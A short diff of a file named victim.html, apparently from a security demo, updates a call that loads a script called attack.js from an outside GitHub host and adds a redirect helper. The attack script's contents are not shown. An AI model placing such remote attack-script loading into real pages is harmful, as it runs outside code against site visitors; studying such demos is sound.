--- a/victim.html
+++ b/victim.html
@@ -7,7 +7,7 @@
 <!--script id="trustedScript" text="type/javascript" src="http://tmasthay1.github.io/attack.js"></script-->
 
 <script text="type/javascript">
-loadExternalJS("third-party","https://raw.github.com/tmasthay1/tmasthay1.github.io/master/attack.js")
+loadExternalJS("third-party","https://raw.githubusercontent.com/tmasthay1/tmasthay1.github.io/master/attack.js")
 loadExternalJS("third-party","http://tmasthay1.github.io/attack.js");
 	
    function redirectsPage(f){
